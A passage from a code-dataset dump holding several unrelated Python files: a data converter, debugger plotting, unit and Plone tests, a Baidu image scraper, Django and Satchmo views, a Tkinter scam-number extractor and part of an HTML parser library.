n[\"Topic\"]\n return n\n def do_strip(n):\n for k in n.keys():\n if n[k] is None:\n del n[k]\n continue\n n[k] = n[k].strip()\n if n[k] == \"0x00\":\n del n[k]\n return n\n\n j2 = list(nit)\n j2 = map(del_topic, j2)\n j2 = map(do_strip, j2)\n if not j2:\n continue\n topic = topic.replace(\" \", \"-\")\n fn = topic.lower() + \".json\"\n print(fn)\n ofile = open(\"%s/%s\" % (args.outdir, fn), \"w\")\n json.dump(list(j2), ofile, sort_keys=True, indent=4, separators=(',', ': '))\n ofile.close()\n","sub_path":"json-to-perf-json.py","file_name":"json-to-perf-json.py","file_ext":"py","file_size_in_byte":3071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"69034383","text":"import io\nimport lldb\nimport debugger\nimport base64\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\n\ndef show():\n image_bytes = io.BytesIO()\n plt.savefig(image_bytes, format='png', bbox_inches='tight')\n document = '' % base64.b64encode(image_bytes.getvalue())\n debugger.display_html('debugger:/plot', title='Pretty Plot', position=2, content={'debugger:/plot': document})\n\ndef plot():\n x = np.linspace(0, 2 * np.pi, 500)\n y1 = np.sin(x)\n y2 = np.sin(3 * x)\n fig, ax = plt.subplots()\n ax.fill(x, y1, 'b', x, y2, 'r', alpha=0.3)\n show()\n\ndef plot_image(cmap='nipy_spectral_r'):\n xdim = lldb.frame.EvaluateExpression('xdim').GetValueAsSigned()\n ydim = lldb.frame.EvaluateExpression('ydim').GetValueAsSigned()\n image = lldb.frame.EvaluateExpression('image')\n data = image.GetData()\n data = data.ReadRawData(lldb.SBError(), 0, data.GetByteSize())\n data = np.frombuffer(data, dtype=np.int32).reshape((ydim,xdim))\n plt.imshow(data, cmap=cmap, interpolation='nearest')\n show()\n","sub_path":"extension/tests/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"457282967","text":"# coding: 
utf8\n\nimport pytest\nfrom app.core import stations as st\nfrom app.core.train import Train\n\n\nUNIQUE_ID = '123456789-0'\nCHAT_ID = 123456789\nLOCALE = 'en'\n\n\n@pytest.fixture()\ndef train():\n return Train(\n unique_id=UNIQUE_ID,\n chat_id=CHAT_ID,\n destination='test',\n storage={'FOO': 'foo'}\n )\n\n\n@pytest.mark.unit\nclass TestBaseStation:\n async def test__stopover(self, train, monkeypatch):\n async def _stopover(*_):\n raise KeyError()\n\n monkeypatch.setattr(\n st.BaseStation, '_stopover', _stopover)\n\n await st.BaseStation.stopover(train)\n assert train.has_fail is True\n\n async def test__logger_error(self, train, monkeypatch):\n async def _stopover(*_):\n raise KeyError()\n\n monkeypatch.setattr(\n st.BaseStation, '_stopover', _stopover)\n\n logger_error_msg = [False]\n\n def logger_error_hdl(*_, **__):\n logger_error_msg[0] = True\n\n monkeypatch.setattr(\n st.logger, 'error', logger_error_hdl)\n\n await st.BaseStation.stopover(train)\n\n assert train.has_fail is True\n assert logger_error_msg[0] is True\n\n async def test__sub_stopover(self, train):\n with pytest.raises(NotImplementedError):\n await st.BaseStation.stopover(train)\n\n\n@pytest.mark.unit\nclass TestUISystemException:\n async def test__sub_stopover(self, train, monkeypatch):\n answer = 'foo'\n monkeypatch.setattr(\n st.ui.SystemException, 'generate',\n lambda _, tr: tr.answers.append(answer)\n )\n train.storage['user_info'] = {\n 'unique_id': UNIQUE_ID,\n 'chat_id': CHAT_ID,\n 'locale': LOCALE\n }\n await st.UISystemExceptionSt.stopover(train)\n\n assert len(train.answers) == 1\n assert train.answers[-1] == answer\n","sub_path":"tests/core/test__stations.py","file_name":"test__stations.py","file_ext":"py","file_size_in_byte":1885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"498768283","text":"import os\nimport unittest\n\nfrom Products.Five import zcml\nfrom Products.Five import fiveconfigure\nfrom Products.Five import 
testbrowser\nfrom Products.PloneTestCase import PloneTestCase as ptc\nfrom Products.PloneTestCase.layer import PloneSite\nptc.setupPloneSite(products=['collective.blog.feeds'])\n\nimport collective.blog.feeds\n\nclass TestCase(ptc.PloneTestCase):\n class layer(PloneSite):\n @classmethod\n def setUp(cls):\n fiveconfigure.debug_mode = True\n zcml.load_config('configure.zcml',\n collective.blog.feeds)\n fiveconfigure.debug_mode = False\n\n @classmethod\n def tearDown(cls):\n pass\n \nclass FunctionalTestCase(ptc.FunctionalTestCase, TestCase):\n \n def test_feeds(self):\n # Use a browser to log into the portal:\n admin = testbrowser.Browser()\n admin.handleErrors = False\n portal_url = self.portal.absolute_url()\n admin.open(portal_url)\n admin.getLink('Log in').click()\n admin.getControl(name='__ac_name').value = ptc.portal_owner\n admin.getControl(name='__ac_password').value = ptc.default_password\n admin.getControl('Log in').click()\n\n # Create a folder to act as the blog:\n admin.getLink(id='folder').click()\n admin.getControl(name='title').value = 'A Blog'\n admin.getControl(name='form.button.save').click()\n # Publish it:\n admin.getLink(id='workflow-transition-publish').click()\n # Save this url for easy access later:\n blog_url = admin.url\n \n # In the folder, create four content types, a Document, a News Item,\n # a File and an Event:\n admin.getLink(id='document').click()\n admin.getControl(name='title').value = 'A Document Blog Entry'\n admin.getControl(name='text').value = 'The main body of the Document'\n admin.getControl(name='form.button.save').click()\n admin.getLink(id='workflow-transition-publish').click()\n \n admin.open(blog_url)\n admin.getLink(id='news-item').click()\n admin.getControl(name='title').value = 'A News Item Blog Entry'\n admin.getControl(name='text').value = 'The main body of the News Item'\n testfile = os.path.join(os.path.dirname(__file__), 'testlogo.jpg')\n thefile = admin.getControl(name='image_file')\n thefile.filename = 
'testlogo.jpg'\n thefile.value = open(testfile, 'rb')\n admin.getControl(name='form.button.save').click()\n admin.getLink(id='workflow-transition-publish').click()\n\n admin.open(blog_url)\n admin.getLink(id='file').click()\n admin.getControl(name='title').value = 'A File Blog Entry'\n testfile = os.path.join(os.path.dirname(__file__), 'testaudio.mp3')\n thefile = admin.getControl(name='file_file')\n thefile.filename = 'testaudio.mp3'\n thefile.value = open(testfile, 'rb')\n admin.getControl(name='form.button.save').click()\n\n admin.open(blog_url)\n admin.getLink(id='event').click()\n admin.getControl(name='title').value = 'An Event Blog Entry'\n admin.getControl(name='text').value = 'The main body of the Event'\n admin.getControl(name='form.button.save').click()\n admin.getLink(id='workflow-transition-publish').click()\n \n #############################\n ## Now, make sure things work\n #############################\n \n # First, check that the feeds are listed in the header:\n anon = testbrowser.Browser()\n anon.handleErrors = False\n anon.open(blog_url)\n self.assert_('atom.xml' in anon.contents)\n self.assert_('feed.rdf' in anon.contents)\n self.assert_('feed11.rdf' in anon.contents)\n self.assert_('rss.xml' in anon.contents)\n self.assert_('itunes.xml' in anon.contents)\n \n # Now check that the correct info is in the feeds. We'll assume that\n # basesyndication/fatsyndication is not broken, and check only rss.xml.\n anon.open(blog_url+'/rss.xml')\n # The document:\n self.assert_('The main body of the Document' in anon.contents)\n # The news item with image:\n self.assert_('The main body of the News Item' in anon.contents)\n self.assert_('/image' in anon.contents)\n # The file:\n self.assert_('>> ', end='')\n entry = input()\n if entry == \"quit\" or entry == \"q\":\n break\n if not entry.isdigit():\n print(\"Thats not a Number. 
Please try again\")\n else:\n if int(entry) <= 15:\n print(str(math.e)[0:int(entry)+2])\n else:\n print(math.e, \"| 15 is the max of after decimals\")\n\n\nif __name__ == '__main__':\n shell()\n","sub_path":"python/EDecimals.py","file_name":"EDecimals.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"406210115","text":"#coding:utf-8\nimport urllib.request\nimport urllib.parse\nimport re\nimport logging # 引入logging模块\ndef get_html(url):\n page = urllib.request.urlopen(url)\n htmlcode = page.read()\n htmlCode = htmlcode.decode('utf-8')\n return htmlCode\n # print(htmlcode)\n #写文件操作n\n # pageFile = open('pageCode.txt','wb+')\n # pageFile.write(htmlcode)\n # pageFile.close()\ndef logFunction():\n # 将信息打印到控制台上\n logging.debug(u\"苍井空\")\n logging.info(u\"麻生希\")\n logging.warning(u\"小泽玛利亚\")\n logging.error(u\"桃谷绘里香\")\n logging.critical(u\"泷泽萝拉\")\ndef myselfLogFunction():\n logging.basicConfig(level=logging.NOTSET)\n logger = logging.getLogger('')\n logger.setLevel(logging.NOTSET)\n logging.debug(u\"是否可以显示呢?\")\n logging.info(u\"这两条信息都应该被显示才对!\")\nif __name__ == '__main__':\n logFunction()\n myselfLogFunction()\n # reg = r'src=\"(.+?\\.jpg)\"width'\n # 加r表示后面的内容不被转义\n # reg = r'src=\"(.+?\\.jpg)\" width'\n reg = r'https://[^\\s]*?\\.jpg'\n reg_img = re.compile(reg)\n imgList = reg_img.findall(get_html('http://tieba.baidu.com/p/1753935195'))\n x = 0\n for img in imgList:\n print(img)\n urllib.request.urlretrieve(img,'D:\\Work\\Python\\Img\\%s.jpg' %x)\n x += 1\n\n","sub_path":"cnblog.py","file_name":"cnblog.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"536233203","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n #class변수 선언\n 
res: int=0\n \n def rangeSumBST(self, root: TreeNode, L: int, R: int) -> int:\n def DFS(root):\n if root is None:res=0\n stack=collections.deque([root])\n \n while stack:\n tmp=stack.pop()\n if (L<=tmp.val) and (tmp.val<=R):self.res+=tmp.val\n if tmp.left:stack.append(tmp.left)\n if tmp.right:stack.append(tmp.right)\n DFS(root)\n return self.res\n \n","sub_path":"leetcode/938_RangeSumofBST.py","file_name":"938_RangeSumofBST.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"167038072","text":"from decimal import Decimal\n\nfrom django.contrib import messages\nfrom django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.utils.translation import gettext_lazy as _\nfrom django.views.generic import FormView, UpdateView\nfrom django.views.generic.detail import SingleObjectMixin\ntry:\n from django.core.urlresolvers import reverse\nexcept ImportError:\n from django.urls import reverse\n\nfrom livesettings.functions import config_get_group\nfrom payment import active_gateways\nfrom payment.forms import PaymentMethodForm, CustomChargeForm\nfrom satchmo_store.shop.models import Order, OrderItem\nfrom satchmo_utils.dynamic import lookup_url\nfrom satchmo_utils.views import bad_or_missing\nimport logging\n\nlog = logging.getLogger('payment.views.balance')\n \n \n# def balance_remaining_order(request, order_id=None):\n# \"\"\"Load the order into the session, so we can charge the remaining amount\"\"\"\n# # this will create an \"OrderCart\" - a fake cart to allow us to check out\n# request.session['cart'] = 'order'\n# request.session['orderID'] = order_id\n# return balance_remaining(request)\n \n\nclass BalanceRemainingView(SingleObjectMixin, FormView):\n model = Order\n template_name = \"shop/checkout/balance_remaining.html\"\n form_class = PaymentMethodForm\n context_object_name = \"order\"\n \n def get_object(self):\n try:\n return 
self.model.objects.get(pk=self.request.session.get('orderID'))\n except self.model.DoesNotExist:\n pass\n\n def dispatch(self, request, *args, **kwargs):\n self.object = self.get_object()\n if not self.object:\n return HttpResponseRedirect(reverse('satchmo_checkout-step1'))\n return super(BalanceRemainingView, self).dispatch(request, *args, **kwargs)\n \n def form_valid(self, form):\n modulename = form.cleaned_data['paymentmethod']\n if not modulename.startswith('PAYMENT_'):\n modulename = 'PAYMENT_' + modulename\n self.paymentmodule = config_get_group(modulename)\n return super(BalanceRemainingView, self).form_valid(form)\n \n def get_success_url(self):\n return lookup_url(self.paymentmodule, 'satchmo_checkout-step2')\n\n def get_form_kwargs(self):\n kwargs = super(BalanceRemainingView, self).get_form_kwargs()\n kwargs[\"order\"] = self.object\n return kwargs\n\n def get_context_data(self, **kwargs):\n context = super(BalanceRemainingView, self).get_context_data(**kwargs)\n context['paymentmethod_ct'] = len(active_gateways())\n return context\n\n\nclass BalanceRemainingOrderView(BalanceRemainingView):\n pk_url_kwarg = 'order_id'\n \n def dispatch(self, request, *args, **kwargs):\n request.session['cart'] = 'order'\n request.session['orderID'] = kwargs.get(self.pk_url_kwarg)\n return super(BalanceRemainingOrderView, self).dispatch(request, *args, **kwargs)\n \n \n# def balance_remaining(request):\n# \"\"\"Allow the user to pay the remaining balance.\"\"\"\n# order = None\n# orderid = request.session.get('orderID')\n# if orderid:\n# try:\n# order = Order.objects.get(pk=orderid)\n# except Order.DoesNotExist:\n# # TODO: verify user against current user\n# pass\n \n# if not order:\n# url = urlresolvers.reverse('satchmo_checkout-step1')\n# return HttpResponseRedirect(url)\n\n# if request.method == \"POST\":\n# new_data = request.POST.copy()\n# form = PaymentMethodForm(data=new_data, order=order)\n# if form.is_valid():\n# data = form.cleaned_data\n# modulename = 
data['paymentmethod']\n# if not modulename.startswith('PAYMENT_'):\n# modulename = 'PAYMENT_' + modulename\n \n# paymentmodule = config_get_group(modulename)\n# url = lookup_url(paymentmodule, 'satchmo_checkout-step2')\n# return HttpResponseRedirect(url)\n \n# else:\n# form = PaymentMethodForm(order=order)\n \n# ctx = {\n# 'form' : form, \n# 'order' : order,\n# 'paymentmethod_ct': len(active_gateways())\n# }\n# return render(request, 'shop/checkout/balance_remaining.html', ctx)\n\n\nclass ChargeRemainingUpdateView(UpdateView):\n template_name = 'payment/admin/charge_remaining_confirm.html'\n model = OrderItem\n form_class = CustomChargeForm\n pk_url_kwarg = 'orderitem_id'\n\n def get_form_kwargs(self):\n kwargs = super(ChargeRemainingUpdateView, self).get_form_kwargs()\n kwargs[\"orderitem\"] = self.object.pk\n kwargs[\"amount\"] = self.object.product.customproduct.full_price\n return kwargs\n \n def get_success_url(self):\n #return reverse('journal', kwargs={'year': self.object.date.year, 'month': self.object.date.month, 'day': self.object.date.day})\n return '/admin/shop/order/%i' % self.object.order.pk\n \n def form_valid(self, form):\n messages.add_message(self.request, messages.INFO, 'Charged for custom product and recalculated totals.')\n return super(ChargeRemainingUpdateView, self).form_valid(form)\n \n \ndef charge_remaining(request, orderitem_id):\n \"\"\"Given an orderitem_id, this returns a confirmation form.\"\"\"\n \n try:\n orderitem = OrderItem.objects.get(pk = orderitem_id)\n except OrderItem.DoesNotExist:\n return bad_or_missing(request, _(\"The orderitem you have requested doesn't exist, or you don't have access to it.\"))\n \n amount = orderitem.product.customproduct.full_price\n \n data = {\n 'orderitem' : orderitem_id,\n 'amount' : amount,\n }\n form = CustomChargeForm(data)\n return render(request, 'payment/admin/charge_remaining_confirm.html', {'form' : form})\n\ndef charge_remaining_post(request):\n if not request.method == 'POST':\n return 
bad_or_missing(request, _(\"No form found in request.\"))\n \n data = request.POST.copy()\n \n form = CustomChargeForm(data)\n if form.is_valid():\n data = form.cleaned_data\n try:\n orderitem = OrderItem.objects.get(pk = data['orderitem'])\n except OrderItem.DoesNotExist:\n return bad_or_missing(request, _(\"The orderitem you have requested doesn't exist, or you don't have access to it.\"))\n \n price = data['amount']\n line_price = price*orderitem.quantity\n orderitem.unit_price = price\n orderitem.line_item_price = line_price\n orderitem.save()\n #print(\"Orderitem price now: %s\" % orderitem.line_item_price)\n \n order = orderitem.order\n \n if not order.shipping_cost:\n order.shipping_cost = Decimal(\"0.00\")\n \n if data['shipping']:\n order.shipping_cost += data['shipping']\n \n order.recalculate_total()\n \n messages.add_message(request, messages.INFO, 'Charged for custom product and recalculated totals.')\n\n notes = data['notes']\n if not notes:\n notes = 'Updated total price'\n \n order.add_status(notes=notes)\n \n return HttpResponseRedirect('/admin/shop/order/%i' % order.id)\n else:\n return render(request, 'admin/charge_remaining_confirm.html', {'form': form})\n","sub_path":"satchmo/apps/payment/views/balance.py","file_name":"balance.py","file_ext":"py","file_size_in_byte":7354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"171335918","text":"# ============================================\n# Phone Number Extractor GUI\n#\n# Author: Slick\n# Date : 6/26/2020\n# ===============================================\nfrom tkinter import *\nfrom tkinter import messagebox\nfrom tkinter import scrolledtext\nimport numpy as np\nimport datetime\nimport requests\nimport bs4\nimport csv\nimport re\nimport os\n\n\nclass NumExtApp:\n def __init__(self):\n # main window\n self.win = Tk()\n self.win.title('')\n self.win.configure(background='black')\n self.win.geometry('525x500')\n self.win.resizable(False, 
False)\n # the goods\n self.file_path = '/home/slick/textFiles/scammer_info.csv'\n self.add_widgets()\n\n def add_widgets(self):\n # create frames-----------------------------------------------------\n self.topframe = Frame(self.win, background='black')\n self.midframe = Frame(self.win, background='black')\n self.botframe = Frame(self.win, background='black')\n # pack frames\n self.topframe.pack(expand=1, fill=BOTH, padx=5, pady=2)\n self.midframe.pack(expand=1, fill=BOTH, padx=5)\n self.botframe.pack(expand=1, fill=BOTH)\n\n # add to top frame---------------------------------------------------\n self.title_label = Label(self.topframe, text='# Extractor 3000',\n font=('fixedsys', 20), bg='black', fg='white')\n self.title_label.pack(anchor='s', pady=35)\n\n self.url_label = Label(self.topframe, text='URL:',\n font=('fixedsys', 12), bg='black', fg='white')\n self.url_label.pack(side=LEFT, anchor='n', padx=10, pady=20)\n\n self.url_variable = StringVar()\n self.entrybox = Entry(self.topframe, width=43, textvariable=self.url_variable,\n bd=4, font=('times', 11))\n self.entrybox.pack(side=LEFT, anchor='n', pady=20)\n self.entrybox.insert(0, 'techscammersunited.com')\n\n # add top middle frame-----------------------------------------------------\n self.extr_button = Button(self.midframe, text='Extract', command=self.magic)\n self.clrbutton = Button(self.midframe, text='Clear', command=self.clear,\n width=7)\n self.extr_button.pack(side=LEFT, pady=15, padx=40)\n self.clrbutton.pack(side=RIGHT, padx=40)\n\n # add to bottom frame-----------------------------------------------------\n self.scrolltxt = scrolledtext.ScrolledText(self.botframe, height=18,\n width=75,\n font=('arial', 12, 'bold'))\n self.scrolltxt.pack()\n\n #A regex match for phone numbers------------------------------------------\n self.phoneNumRegex = re.compile(r'''(\n (\\d{3}|\\(\\d{3}\\))\n (\\s|-|\\.)?\n (\\d{3})\n (\\s|-|\\.)\n (\\d{4})\n )''', re.VERBOSE)\n\n def get_webpage(self):\n \"\"\"Grabs a 
webpage's HTML and saves it as text\"\"\"\n if 'https:' in self.url_variable.get().split('/'):\n self.webpage = requests.get(self.url_variable.get()).text\n else:\n self.webpage = requests.get('https://' + self.url_variable.get()).text\n\n def extract_(self):\n \"\"\"Extracts phone numbers from saved webpage and\n saves them in a list\"\"\"\n # creating Beautiful soup object\n self.scammer_soup = bs4.BeautifulSoup(self.webpage, features=\"html.parser\")\n # selecting info from page\n self.urls_and_nums = self.scammer_soup.select('div span a')\n self.scammer_types = self.scammer_soup.select('div span span')\n # making container to hold data\n self.data_list = []\n # displaying scam heading info\n for i in range(len(self.urls_and_nums) - 3):\n for data in self.urls_and_nums[i + 3]:\n self.data_list.append(data)\n # making container to hold scam types\n self.type_list = []\n for i in range(len(self.scammer_types) - 3):\n for data in self.scammer_types[i + 3]:\n self.type_list.append(data)\n # making container to hold numbers\n self.scammer_numbers = []\n for line in self.data_list:\n if self.phoneNumRegex.search(line):\n self.scammer_numbers.append(self.phoneNumRegex.search(line).group())\n else:\n self.scammer_numbers.append(None)\n\n self.scam_types = []\n for line in self.type_list:\n if line:\n self.scam_types.append(str(line.upper()))\n else:\n self.scam_types.append(None)\n\n # making arrays out of separated data\n self.scams = np.array(self.scam_types).reshape(len(self.scam_types), 1)\n self.nums = np.array(self.scammer_numbers[:-1]).reshape(len(self.scammer_numbers) - 1, 1)\n self.dates = np.array([str(datetime.date.today()) for x in self.nums]).reshape(len(self.scam_types), 1)\n\n # taking all data and matching attributes together (scam_type, phone_num,\n # and date)\n self.data = np.hstack([self.scams, self.nums, self.dates])\n\n def save2file(self):\n \"\"\"Saves extracted data to .csv file\"\"\"\n if os.path.exists(self.file_path):\n # make a csv reader 
and writer\n with open(self.file_path) as csv_file_text:\n csv_reader = csv.reader(csv_file_text, delimiter='\\t')\n with open(self.file_path, 'a') as csv_file:\n csv_writer = csv.writer(csv_file, delimiter='\\t')\n # making a list of all numbers ALREADY collected\n file_nums = [row[1] for row in csv_reader]\n # if the phone number isn't already there, add it\n for row in self.data:\n type_, num, date = row\n if 'SCAM' in type_ and 'TOOL' not in type_ and num and \\\n num not in file_nums and 'DEAD' not in type_:\n csv_writer.writerow(row)\n # if no database file, will create one\n else:\n # create a csv writer\n with open(self.file_path, 'a') as csv_file:\n csv_writer = csv.writer(csv_file, delimiter='\\t')\n # add categories\n csv_writer.writerow(['Scam Type', 'Phone Number', 'Date'])\n # add all collected data\n for row in self.data:\n type_2, num2, date2 = row\n if 'SCAM' in type_2 and 'TOOL' not in type_2 and num2:\n csv_writer.writerow(row)\n\n def display(self):\n \"\"\"Displays extracted numbers in scroll text widget\"\"\"\n if len(self.data) > 0:\n self.scrolltxt.insert(INSERT, f'<<{self.url_variable.get()}>>\\n\\n')\n title1, title2, title3 = ['Type', 'Phone Number', 'Date']\n self.scrolltxt.insert(INSERT, ('-' * 50) + '\\n')\n self.scrolltxt.insert(INSERT, f'{title1:^21}| {title2:^15}| {title3:^8}' + '\\n')\n self.scrolltxt.insert(INSERT, ('-' * 50) + '\\n')\n for type_, num, date in self.data:\n if num:\n self.scrolltxt.insert(INSERT, f'{type_:<21}| {num:15}| {date:8}' + '\\n')\n self.scrolltxt.insert(INSERT, ('-'*50) + '\\n')\n self.scrolltxt.insert(INSERT, f'\\n<<{self.url_variable.get()}>>\\n')\n self.entrybox.delete(0, END)\n else:\n messagebox.showerror(message='Sorry! 
No Luck...')\n\n def magic(self):\n \"\"\"The whole sha bang\"\"\"\n try:\n self.get_webpage()\n self.extract_()\n self.save2file()\n self.display()\n except:\n messagebox.showerror('Error', 'Please enter a full valid url')\n\n def clear(self):\n self.scrolltxt.delete('1.0', END)\n\n\napp = NumExtApp()\napp.win.mainloop()\n","sub_path":"phone_num_ex_GUI.py","file_name":"phone_num_ex_GUI.py","file_ext":"py","file_size_in_byte":7995,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"619880582","text":"from django import forms\n\n\nclass SubjectForm(forms.Form):\n\n subject = forms.CharField(\n error_messages={\n 'required': '진료과목을 선택해주세요'\n },\n label='진료과목'\n )\n\n def clean(self):\n cleaned_data = super().clean()\n subject = cleaned_data.get('subject')\n\n if subject:\n if subject not in [\"피부과\", \"성형외과\", \"이비인후과\", \"내과\", \"소아청소년과\", \"정형외과\", \"안과\", \"치과\", \"한의원\",\"산부인과\", \"비뇨기과\", \"정신건강의학과\", \"가정의학과\", \"외과\", \"신경외과\", \"마취통증의학과\", \"신경과\"]:\n self.add_error('subject','없는 진료과목 입니다')\n\n\n\n","sub_path":"analysis_web/competitiveness/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"460828985","text":"#!/usr/bin/env python\n\"\"\"\nThe MIT License (MIT)\n\nCopyright (c) 2013 Rafael Marmelo\nCopyright (c) 2016 William Forde\n\nPermission is hereby granted, free of charge, to any person obtaining a copy of\nthis software and associated documentation files (the \"Software\"), to deal in\nthe Software without restriction, including without limitation the rights to\nuse, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of\nthe Software, and to permit persons to whom the Software is furnished to do so,\nsubject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the 
Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS\nFOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR\nCOPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER\nIN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN\nCONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\"\"\"\n\n# Python 2 compatibility\nfrom __future__ import unicode_literals\n\n# Standard library imports\nimport warnings\nimport sys\nimport re\n\n# Import the faster C implementation of ElementTree whenever available\ntry:\n from xml.etree import cElementTree as Etree\nexcept ImportError:\n from xml.etree import ElementTree as Etree\n\n# Check python version to set the object that can detect non unicode strings\nif sys.version_info >= (3, 0):\n # noinspection PyCompatibility\n from html.parser import HTMLParser\nelse:\n # noinspection PyUnresolvedReferences,PyUnresolvedReferences,PyCompatibility\n from HTMLParser import HTMLParser\n\n# When using 'from htmlement import *'\n__all__ = [\"HTMLement\", \"HTMLParseError\", \"fromstring\", \"fromstringlist\", \"make_unicode\"]\n\n\ndef fromstring(text, tag=None, attrs=None):\n \"\"\"\n Parses an HTML Source into an element tree from a string.\n\n *text* is a string containing html data,\n Refer to :class:'HTMLement' for all other arguments\n \"\"\"\n parser = HTMLement(tag, attrs)\n parser.feed(text)\n return parser.close()\n\n\ndef fromstringlist(sequence, tag=None, attrs=None):\n \"\"\"\n Parses an HTML Source into an element tree from a sequence of strings.\n\n *sequence* is a sequence of strings containing html data,\n Refer to :class:'HTMLement' for all other arguments\n \"\"\"\n parser = HTMLement(tag, attrs)\n for text in sequence:\n parser.feed(text)\n return parser.close()\n\n\ndef parse(source, tag=None, attrs=None):\n \"\"\"\n Load 
external HTML document into element tree.\n\n *source* is a file name or file object\n \"\"\"\n # Assume that source is a file pointer if no read methods is found\n if hasattr(source, \"read\"):\n source = open(source, \"rb\")\n close_source = True\n else:\n close_source = False\n\n try:\n parser = HTMLement(tag, attrs)\n while True:\n # Read in 64k at a time\n data = source.read(65536)\n if not data:\n break\n\n # Feed the parser\n parser.feed(data)\n\n # Return the root element\n return parser.close()\n\n finally:\n if close_source:\n source.close()\n\n\ndef make_unicode(source, encoding=None, default_encoding=\"iso-8859-1\"):\n \"\"\"\n Turn's html source into unicode if not already unicode.\n\n If source is not unicode and no encoding is specified then the encoding\n will be extracted from the html source meta tag if available.\n Will default to iso-8859-1 if unable to find encoding.\n\n Parameters\n ----------\n source : basestring\n The html source data\n\n encoding : str, optional\n The encoding used to convert html source to unicode\n\n default_encoding : str, optional(default=\"iso-8859-1\")\n The default encoding to use if no encoding was specified and\n was unable to extract the encoding from the html source.\n \"\"\"\n if not isinstance(source, bytes):\n return source\n\n elif encoding is None:\n # Atemp to find the encoding from the html source\n end_head_tag = source.find(b\"\")\n if end_head_tag:\n # Search for the charset attribute within the meta tags\n charset_refind = b''\n charset = re.search(charset_refind, source[:end_head_tag], re.IGNORECASE)\n if charset:\n encoding = charset.group(1)\n else:\n warn_msg = \"Unable to determine encoding, defaulting to {}\".format(default_encoding)\n warnings.warn(warn_msg, UnicodeWarning, stacklevel=1)\n else:\n warn_msg = \"Unable to determine encoding, defaulting to {}\".format(default_encoding)\n warnings.warn(warn_msg, UnicodeWarning, stacklevel=1)\n\n # Decode the string into unicode\n return 
source.decode(encoding if encoding else default_encoding)\n\n\n# Required for raiseing HTMLParseError in python3, emulates python2\nclass HTMLParseError(Exception):\n \"\"\"Exception raised for all parse errors.\"\"\"\n def __init__(self, msg, position=(None, None)):\n self.msg = msg\n self.lineno = position[0]\n self.offset = position[1]\n\n def __str__(self):\n result = self.msg\n if self.lineno is not None:\n result += \", at line %d\" % self.lineno\n if self.offset is not None:\n result += \", column %d\" % self.offset\n return result\n\n\nclass HTMLement(object):\n \"\"\"\n Python HTMLParser extension with ElementTree support.\n @see https://github.com/willforde/python-htmlement\n\n This HTML Parser extends html.parser.HTMLParser returning an xml.etree.ElementTree.Element instance.\n The returned root element natively supports the ElementTree API.\n (e.g. you may use its limited support for XPath expressions)\n\n @see https://docs.python.org/3/library/xml.etree.elementtree.html#xml.etree.ElementTree.Element\n @see https://docs.python.org/3/library/xml.etree.elementtree.html#xpath-support\n \"\"\"\n def __init__(self, tag=None, attrs=None):\n self._parser = ParseHTML(tag, attrs)\n self.finished = False\n\n def feed(self, source):\n \"\"\"Feeds data to the parser. data is unicode data.\"\"\"\n # Skip feeding data into parser if we already have what we want\n if self.finished is True:\n return None\n\n # Make sure that we have unicode before continuing\n if isinstance(source, bytes):\n raise ValueError(\"HTML source must be unicode not string. 
Please feed me unicode\")\n\n # Parse the html document\n try:\n self._parser.feed(source)\n except EOFError:\n self.finished = True\n self._parser.reset()\n\n def close(self):\n # Close the tree builder and return the root element that is returned by the treebuilder\n return self._parser.close()\n\n\nclass ParseHTML(HTMLParser):\n def __init__(self, tag, attrs):\n # Initiate HTMLParser\n HTMLParser.__init__(self)\n self.convert_charrefs = True\n self._root = None # root element\n self._data = [] # data collector\n self._factory = Etree.Element\n\n # Split attributes into wanted and unwanted attributes\n self._unw_attrs = [attrs.pop(key) for key, value in attrs.items() if value is False] if attrs else []\n self.attrs = attrs if attrs else {}\n self.enabled = not tag\n self.tag = tag\n\n # Some tags in html do not require closing tags so thoes tags will need to be auto closed (Void elements)\n # Refer to: https://www.w3.org/TR/html/syntax.html#void-elements\n self._voids = frozenset((\"area\", \"base\", \"br\", \"col\", \"hr\", \"img\", \"input\", \"link\", \"meta\", \"param\",\n # Only in HTML5\n \"embed\", \"keygen\", \"source\", \"track\",\n # Not supported in HTML5\n \"basefont\", \"frame\", \"isindex\",\n # SVG self closing tags\n \"rect\", \"circle\", \"ellipse\", \"line\", \"polyline\", \"polygon\",\n \"path\", \"stop\", \"use\", \"image\", \"animatetransform\"))\n\n # Create temporary root element to protect from badly written sites that either\n # have no html starting tag or multiple top level elements\n elem = self._factory(\"html\")\n self._elem = 